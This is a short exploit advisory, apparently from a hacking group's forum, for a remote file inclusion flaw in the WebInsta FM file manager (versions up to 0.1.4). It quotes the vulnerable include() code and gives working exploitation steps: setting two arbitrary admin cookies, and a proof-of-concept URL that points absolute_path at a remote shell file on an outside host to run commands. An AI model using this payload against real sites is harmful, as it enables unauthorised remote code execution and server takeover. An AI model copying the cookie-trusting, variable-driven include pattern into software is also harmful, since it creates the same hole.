Program Title ################################################################################
WebInsta FM <= 0.1.4 Remote File Inclusion Vulnerability

Description ##################################################################################
This is a basic file manager written by WebInsta.com

Vuln Code ####################################################################################
In /admin/login.php:
   if(isset($_COOKIE['adminname']) && isset($_COOKIE['adminpass'])){
      $cusername = $_COOKIE['adminname'];
      $cpassword = $_COOKIE['adminpass'];
	  include($absolute_path."admin/checkpass.php");
	  }

Exploit ######################################################################################
In order for this exploit to work, you need to set two cookies. Once set, these cookies are
never analyzed for their actual content. If you use FireFox, you can set them with the AnEC
Cookie Editor extension. The two cookies should be set as follows:

NAME - adminname
CONTENT - anything here
HOST - current site (www.site.com)
PATH - nothing

NAME - adminpass
CONTENT - anything here
HOST - current site (www.site.com)
PATH - nothing

Once set, the PoC URL is as follows:
http://site.com/path/to/files/admin/login.php?absolute_path=http://shell.com/shell.txt?cmd=ls

Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.

Script Download ##############################################################################
http://webinsta.com/cgi-bin/axs/ax.pl?http://www.webinsta.com/downloads/webinstafm.zip

Original Advisory ############################################################################
http://g00ns-forum.net/

Shouts #######################################################################################
g00ns.net
13337.org
rezen.org

By MurderSkillz & FiSh of g00ns.net